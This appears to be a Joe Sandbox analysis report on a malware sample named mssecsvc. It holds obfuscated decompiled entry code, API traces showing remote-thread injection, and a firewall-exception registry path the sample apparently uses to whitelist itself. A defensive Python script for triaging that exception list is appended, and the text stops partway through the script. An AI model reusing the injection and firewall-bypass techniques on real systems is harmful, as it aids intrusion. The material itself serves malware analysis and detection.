                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A80805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00A80842
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A8085D
                                                                                • CloseHandle.KERNEL32 ref: 00A8086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Handle$CreateProcess32$AdjustChangeFindFirstFreeLibraryLookupNextNotificationOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                • String ID: csrs
                                                                                • API String ID: 2727238916-2321902090
                                                                                • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                • Instruction ID: 832f1897af47fc7174f13e4db59b71070573a49a6f03b8d232631357d92e75a7
                                                                                • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                • Instruction Fuzzy Hash: 86112B30601205BBEB657F21CD4AFBF3A6DEF44701F00002CF94A9A081CAB49B459BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 181 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 184 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 181->184 185 409a8d-409a98 __setusermatherr 181->185 188 409af2-409afa 184->188 189 409b2c-409b2f 184->189 185->184 192 409b00-409b03 188->192 193 409afc-409afe 188->193 190 409b31-409b35 189->190 191 409b09-409b0d 189->191 190->189 194 409b13-409ecb 191->194 195 409b0f-409b11 191->195 192->191 196 409b05-409b06 192->196 193->188 193->192 195->194 195->196 196->191
                                                                                C-Code - Quality: 73%
                                                                                			_entry_(void* __ebx, void* __edx) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v84;
                                                                                				char _v96;
                                                                                				int _v100;
                                                                                				char** _v104;
                                                                                				intOrPtr _v108;
                                                                                				void _v112;
                                                                                				char** _v116;
                                                                                				intOrPtr* _v120;
                                                                                				void* _v136;
                                                                                				short _v152;
                                                                                				char _v184;
                                                                                				void* _v1114639227;
                                                                                				void* __esi;
                                                                                				void* _t50;
                                                                                				intOrPtr _t59;
                                                                                				signed char _t74;
                                                                                				void* _t83;
                                                                                				int _t86;
                                                                                				void* _t88;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr _t90;
                                                                                				intOrPtr _t92;
                                                                                				void* _t95;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				signed int _t104;
                                                                                				void* _t108;
                                                                                				signed char _t111;
                                                                                				signed int _t125;
                                                                                				void* _t133;
                                                                                				intOrPtr* _t136;
                                                                                				intOrPtr _t141;
                                                                                				intOrPtr _t142;
                                                                                				intOrPtr* _t143;
                                                                                				void* _t146;
                                                                                				intOrPtr _t148;
                                                                                				void* _t159;
                                                                                				void* _t160;
                                                                                				void* _t163;
                                                                                
                                                                                				_t108 = __edx;
                                                                                				_push(0xffffffff);
                                                                                				_push(0x40a1a0);
                                                                                				_push(0x409ba2);
                                                                                				_push( *[fs:0x0]);
                                                                                				 *[fs:0x0] = _t141;
                                                                                				_t142 = _t141 - 0x68;
                                                                                				_push(__ebx);
                                                                                				_push(_t133);
                                                                                				_v28 = _t142;
                                                                                				_v8 = 0;
                                                                                				__set_app_type(2);
                                                                                				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                                                				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                                                				 *(__p__fmode()) =  *0x70f88c;
                                                                                				 *(__p__commode()) =  *0x70f888;
                                                                                				 *0x70f890 = _adjust_fdiv;
                                                                                				_t50 = E00409BA1( *_adjust_fdiv);
                                                                                				_t148 =  *0x431410; // 0x1
                                                                                				if(_t148 == 0) {
                                                                                					__setusermatherr(E00409B9E);
                                                                                				}
                                                                                				E00409B8C(_t50);
                                                                                				_push(0x40b010);
                                                                                				_push(0x40b00c);
                                                                                				L00409B86();
                                                                                				_v112 =  *0x70f884;
                                                                                				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                                                				_push(0x40b008);
                                                                                				_push(0x40b000); // executed
                                                                                				L00409B86(); // executed
                                                                                				_t143 = _t142 + 0x24;
                                                                                				_t136 =  *_acmdln;
                                                                                				_v120 = _t136;
                                                                                				if( *_t136 != 0x22) {
                                                                                					while( *_t136 > 0x20) {
                                                                                						_t136 = _t136 + 1;
                                                                                						_v120 = _t136;
                                                                                					}
                                                                                				} else {
                                                                                					do {
                                                                                						_t136 = _t136 + 1;
                                                                                						_v120 = _t136;
                                                                                						_t92 =  *_t136;
                                                                                					} while (_t92 != 0 && _t92 != 0x22);
                                                                                					if( *_t136 == 0x22) {
                                                                                						L6:
                                                                                						_t136 = _t136 + 1;
                                                                                						_v120 = _t136;
                                                                                					}
                                                                                				}
                                                                                				_t59 =  *_t136;
                                                                                				if(_t59 != 0 && _t59 <= 0x20) {
                                                                                					goto L6;
                                                                                				}
                                                                                				_v52 = 0;
                                                                                				_push( &_v96);
                                                                                				asm("sbb dh, bh");
                                                                                				asm("adc dh, 0x43");
                                                                                				asm("clc");
                                                                                				_t101 = 0x6b40;
                                                                                				_t111 =  !(_t108 + 1 - 1);
                                                                                				do {
                                                                                					asm("adc word [ecx+0xa6b000], 0x592d");
                                                                                					asm("lahf");
                                                                                					_t74 = 0xbadbb2 &  !(_t101 + 1);
                                                                                					_t159 = _t74 - _t101;
                                                                                					asm("sbb edx, 0x10");
                                                                                					_t101 = _t101 - 2;
                                                                                					_t111 = _t74;
                                                                                				} while (_t159 >= 0);
                                                                                				_t83 = _t133 - 7;
                                                                                				_t125 = _t111 - 1;
                                                                                				_t160 =  *_t143 - 0xfffffffe;
                                                                                				do {
                                                                                				} while (_t160 > 0);
                                                                                				asm("pushad");
                                                                                				_t146 =  &_v184 - 0xffffffdc;
                                                                                				L00A71825();
                                                                                				goto L27;
                                                                                				do {
                                                                                					do {
                                                                                						do {
                                                                                							L27:
                                                                                							_t95 = 0xffffffffffffffff;
                                                                                							do {
                                                                                								_t95 = _t95 - 1;
                                                                                							} while (_t95 != 0);
                                                                                							_t83 = _t83 + 1;
                                                                                							_t125 = _t101 + _t125;
                                                                                							_t102 =  *((intOrPtr*)(_t95 + 0x3c));
                                                                                							_t101 = _t102 - 0x7ffffffd;
                                                                                							_t163 = _t101;
                                                                                						} while (_t163 >= 0);
                                                                                						asm("sbb ecx, 0x13e6");
                                                                                						_t125 =  !_t125;
                                                                                					} while (_t163 >= 0);
                                                                                					_push( *((intOrPtr*)(_t101 + _t95 - 0x7fffec1c)));
                                                                                					_t83 = _t83 + 1;
                                                                                					_t146 = _t146 + 4;
                                                                                					_t37 =  &_v152;
                                                                                					 *_t37 = _v152 + 0xbab0;
                                                                                				} while ( *_t37 != 0);
                                                                                				_push(0xaba79f19);
                                                                                				L00A718FA(_t83, _t95, _t136);
                                                                                				_v84 = _t136;
                                                                                				asm("sbb edx, 0x49174bd6");
                                                                                				_t104 =  !(_t101 - 0xed);
                                                                                				_t86 = L00A71A00(_t95, _t104, _t125, _t136);
                                                                                				_v100 = _t86;
                                                                                				if(_t86 - 4 >= 0) {
                                                                                					_t89 =  *[fs:0x18];
                                                                                					_t125 = _t125 & 0xffffff00 | _t165;
                                                                                					if(_t89 < 0) {
                                                                                						_push(0xa93b14fc);
                                                                                						_t133 = _t133 + 1;
                                                                                						_t90 = L00A718FA(_t89, _t95, _t136);
                                                                                						L00A718F2();
                                                                                						goto L20;
                                                                                					} else {
                                                                                						_t90 =  *((intOrPtr*)(_t89 + 0x34));
                                                                                						_t125 = _t125 + 1;
                                                                                						L20:
                                                                                						if(_t90 == _t95) {
                                                                                							_t104 = _t104 - 1;
                                                                                							L00A718BD();
                                                                                							_t125 = 0x534aa1dd;
                                                                                						}
                                                                                						_push(0xd5459ff8);
                                                                                						L00A718FA(_t90, _t95, _t136);
                                                                                						_push(_v108);
                                                                                						L00A718F2();
                                                                                					}
                                                                                				}
                                                                                				 *0x409b1a = 0xa0a815ff;
                                                                                				 *0x409b1e = 0x40;
                                                                                				_pop(_t88);
                                                                                				return _t88;
                                                                                			}
                                                                                0x00409a16
                                                                                0x00409a19
                                                                                0x00409a1b
                                                                                0x00409a20
                                                                                0x00409a2b
                                                                                0x00409a2c
                                                                                0x00409a33
                                                                                0x00409a36
                                                                                0x00409a38
                                                                                0x00409a39
                                                                                0x00409a3e
                                                                                0x00409a43
                                                                                0x00409a4a
                                                                                0x00409a51
                                                                                0x00409a64
                                                                                0x00409a72
                                                                                0x00409a7b
                                                                                0x00409a80
                                                                                0x00409a85
                                                                                0x00409a8b
                                                                                0x00409a92
                                                                                0x00409a98
                                                                                0x00409a99
                                                                                0x00409a9e
                                                                                0x00409aa3
                                                                                0x00409aa8
                                                                                0x00409ab2
                                                                                0x00409acb
                                                                                0x00409ad1
                                                                                0x00409ad6
                                                                                0x00409adb
                                                                                0x00409ae0
                                                                                0x00409ae8
                                                                                0x00409aea
                                                                                0x00409af0
                                                                                0x00409b2c
                                                                                0x00409b31
                                                                                0x00409b32
                                                                                0x00409b32
                                                                                0x00409af2
                                                                                0x00409af2
                                                                                0x00409af2

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.384287103.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000B.00000002.384275377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 0000000B.00000002.384356505.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 0000000B.00000002.384367996.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 0000000B.00000002.384391046.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 0000000B.00000002.384541259.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                • String ID:
                                                                                • API String ID: 1833031408-0
                                                                                • Opcode ID: a41b4657ff2deeee174bcbbbd79ecb1497c639d275d4a9d0d1393ceb5d6b9313
                                                                                • Instruction ID: 0d0aeb106c39f1347577fd97bc1a6ee6419126cbec86dc1411ea7cfa02004f33
                                                                                • Opcode Fuzzy Hash: a41b4657ff2deeee174bcbbbd79ecb1497c639d275d4a9d0d1393ceb5d6b9313
                                                                                • Instruction Fuzzy Hash: AB318271844348EFD720DFA4EC45A9A7BB4FB09720F20423BE591A72D2D7786C41CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 Control-flow Graph
                                                                                 (graph image not preserved in text; entry block a83c3d; API calls shown in the graph: GetSystemDirectoryA, GetWindowsDirectoryA, GetProcAddress, LoadLibraryA, GetTickCount, GetVolumeInformationA, GetModuleFileNameA, CreateThread, CloseHandle, CreateEventA, lstrlen, RtlExitUserThread, SetEvent, Sleep, ResetEvent, GetVersionExA)
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(00A86AA2,00000104), ref: 00A83CA1
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00A83CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                • GetTickCount.KERNEL32 ref: 00A83D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1749273276-2287716718
                                                                                • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                • Instruction ID: d4ad1339ed3aaef6d319e752c9ec55e0d589f91a092300dca8139a011d667063
                                                                                • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                • Instruction Fuzzy Hash: AE02F172408259BFEF21AF24CC4ABEA7BACEF41710F044519ED499E082D7F45F4687A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 Control-flow Graph
                                                                                 (graph image not preserved in text; entry block a83cc2; API calls shown in the graph: GetModuleHandleA, GetProcAddress, LoadLibraryA, GetTickCount, GetVolumeInformationA, GetModuleFileNameA, CreateThread, CloseHandle, CreateEventA, lstrlen, RtlExitUserThread, SetEvent, Sleep, ResetEvent, GetVersionExA)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00A83CBA), ref: 00A83CC2
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00A83CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                • GetTickCount.KERNEL32 ref: 00A83D93
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2837544101-2287716718
                                                                                • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                • Instruction ID: 5cac90c6037dd1217abd9ca1070a8794bf248bbf523859ba1c8144221eb8000e
                                                                                • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                • Instruction Fuzzy Hash: 1DE10F72508259BFEF25AF24CC0ABEA7BACEF41700F004519ED499E082E6F45F4587A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 Control-flow Graph
                                                                                 (graph image not preserved in text; entry block a83cf0; API calls shown in the graph: GetModuleHandleA, GetSystemDirectoryA, GetProcAddress, LoadLibraryA, GetTickCount, GetVolumeInformationA, GetModuleFileNameA, CreateThread, CloseHandle, CreateEventA, lstrlen, RtlExitUserThread, SetEvent, Sleep, ResetEvent, GetVersionExA)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00A83CE5), ref: 00A83CF0
                                                                                • GetSystemDirectoryA.KERNEL32(00A86AA2,00000104), ref: 00A83D07
                                                                                  • Part of subcall function 00A83D1F: lstrcat.KERNEL32(00A86AA2,00A83D12), ref: 00A83D20
                                                                                  • Part of subcall function 00A83D1F: GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                  • Part of subcall function 00A83D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                  • Part of subcall function 00A83D1F: GetTickCount.KERNEL32 ref: 00A83D93
                                                                                  • Part of subcall function 00A83D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 215653160-2287716718
                                                                                • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                • Instruction ID: 4ab443a3eb1eb06846e5f70b8bd5bdf92c9ff43e481e4fb1ca27562f6dc35dfb
                                                                                • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                • Instruction Fuzzy Hash: 54E1FF72508249BFEF25AF24CC0EBEA7BACEF41700F004659ED499E082D6F45F4587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 Control-flow Graph
                                                                                 (graph image not preserved in text; entry block a83d1f; API calls shown in the graph: lstrcat, GetProcAddress, LoadLibraryA, GetTickCount, GetVolumeInformationA, GetModuleFileNameA, CreateThread, CloseHandle, CreateEventA, lstrlen, RtlExitUserThread, SetEvent, Sleep, ResetEvent, GetVersionExA)
                                                                                APIs
                                                                                • lstrcat.KERNEL32(00A86AA2,00A83D12), ref: 00A83D20
                                                                                  • Part of subcall function 00A83D36: LoadLibraryA.KERNEL32(00A83D2B), ref: 00A83D36
                                                                                  • Part of subcall function 00A83D36: GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                  • Part of subcall function 00A83D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                  • Part of subcall function 00A83D36: GetTickCount.KERNEL32 ref: 00A83D93
                                                                                  • Part of subcall function 00A83D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2038497427-2287716718
                                                                                • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                • Instruction ID: 20da30903828791677f4010d0b63f2f0451aecedf0ef06bf9e07418c9739eed2
                                                                                • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                • Instruction Fuzzy Hash: 9CE1EF72508259BFEF25AF24CC0EBEA7BACEF41700F004559ED499E082E6F46F4587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Interactive control-flow graph omitted. Entry block 00A83D36-00A83DC0 (LoadLibraryA, GetProcAddress, LoadLibraryA, GetTickCount); from 00A83DC8 on the blocks and edges are identical to the graphs listed for 00A83D1F and 00A83D4B (one body, three entry points), ending at RtlExitUserThread (00A84320-00A84322). The executed/not-executed colouring is not recoverable from the text; the API calls reached are listed below.]
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83D2B), ref: 00A83D36
                                                                                  • Part of subcall function 00A83D4B: GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                  • Part of subcall function 00A83D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                  • Part of subcall function 00A83D4B: GetTickCount.KERNEL32 ref: 00A83D93
                                                                                  • Part of subcall function 00A83D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 3734769084-2287716718
                                                                                • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                • Instruction ID: 3cb4380af3215571971cca6529874d6bb3276ab8cb018f5df2c6e13f6b14dbfc
                                                                                • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                • Instruction Fuzzy Hash: E3D1DD72918249BFEF25AF24CC0ABEA7BACEF41700F004659ED499E082D6F45F4587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Interactive control-flow graph omitted. Entry block 00A83D4B-00A83D72 (GetProcAddress, LoadLibraryA), then 00A83D7D-00A83DC0 (GetTickCount); from 00A83DC8 on the blocks and edges are identical to the graphs listed for 00A83D1F and 00A83D36 (one body, three entry points), ending at RtlExitUserThread (00A84320-00A84322). The executed/not-executed colouring is not recoverable from the text; the API calls reached are listed below.]
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                • GetTickCount.KERNEL32 ref: 00A83D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                • CreateThread.KERNEL32(00000000,00000000,00A83691,00000000,00000000), ref: 00A83F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00A83F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00A842D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00A842F7 (0x7530 = 30 000 ms between SetEvent and ResetEvent)
                                                                                • ResetEvent.KERNEL32(?,?,00000000), ref: 00A8430A
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleThread$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolume
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1484325168-2287716718
                                                                                • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                • Instruction ID: dd1a5fdc02b5fc83e2057c047ae76deeac3183287111034bc0bb66dbaa6d39df
                                                                                • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                • Instruction Fuzzy Hash: 12E1EF72508249BFEF25AF248C0EBEA7BACEF45700F004659ED499E082D6F46F45C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
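The listing above pairs GetModuleFileNameA (00A83EE2) with the string SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List (00A83F0C), the per-application exception list of the Windows XP / Server 2003 firewall. The report does not show the write itself; the script below is an added triage example, not code from the report, from Joe Sandbox or from the sample, and it assumes the sample adds its own module path to that list. It parses a `reg query` export of the key and flags enabled exceptions that point at an unexpected binary under the Windows directory, carry a display name that is just the file name, disagree between value name and embedded path, or reference a file that no longer exists. The registry export, the on-disk file set and the `KNOWN_SYSTEM_ENTRIES` baseline are constructed for the example.

```python
r"""Triage the legacy Windows Firewall per-application allow list.

Added example, not code from the Joe Sandbox report or from the sample.  The
report shows GetModuleFileNameA next to the string
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile\AuthorizedApplications\List (the Windows XP / Server 2003
firewall exception list).  This script assumes the sample adds its own path
there and flags entries in a `reg query` export of that key for review.
"""
import ntpath
import os
import re
from typing import Callable, Dict, List

# Each value under ...\AuthorizedApplications\List is named after the program
# path and holds "<path>:<scope>:<Enabled|Disabled>:<display name>".
ENTRY_RE = re.compile(
    r"^(?P<path>.+?):(?P<scope>[^:]+):(?P<state>Enabled|Disabled):(?P<name>.*)$",
    re.IGNORECASE,
)

# Assumed baseline of entries Windows registers itself; anything else under
# %SystemRoot% deserves a look.  Extend per build in a real deployment.
KNOWN_SYSTEM_ENTRIES = {
    r"%windir%\system32\sessmgr.exe",
    r"c:\windows\system32\sessmgr.exe",
}

# Constructed `reg query` output (not taken from the report): a normal Windows
# Messenger exception, an entry as a sample whitelisting its own dropped
# service binary would produce, and a hand-edited entry whose value name and
# data disagree.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
    C:\Program Files\Messenger\msmsgs.exe    REG_SZ    C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger
    C:\WINDOWS\mssecsvc.exe    REG_SZ    C:\WINDOWS\mssecsvc.exe:*:Enabled:mssecsvc.exe
    C:\WINDOWS\system32\svchost.exe    REG_SZ    C:\Documents and Settings\user\Local Settings\Temp\svchost.exe:*:Enabled:svchost
"""

# Files present in the constructed scenario; a live run uses os.path.exists.
PRESENT_ON_DISK = {r"c:\program files\messenger\msmsgs.exe", r"c:\windows\mssecsvc.exe"}


def demo_exists(path: str) -> bool:
    """Stand-in for os.path.exists over the constructed file set."""
    return path.lower() in PRESENT_ON_DISK


def parse_reg_query(text: str) -> List[Dict[str, str]]:
    """Turn `reg query` output into entries: value name plus the parsed data fields."""
    entries = []
    for raw in text.splitlines():
        cols = re.split(r"\s{2,}", raw.strip())
        if len(cols) != 3 or cols[1].upper() != "REG_SZ":
            continue  # key header, blank line or an unexpected value type
        value_name, _, data = cols
        entry = {"value": value_name, "raw": data}
        m = ENTRY_RE.match(data)
        if m:
            entry.update({k: v.strip() for k, v in m.groupdict().items()})
        entries.append(entry)
    return entries


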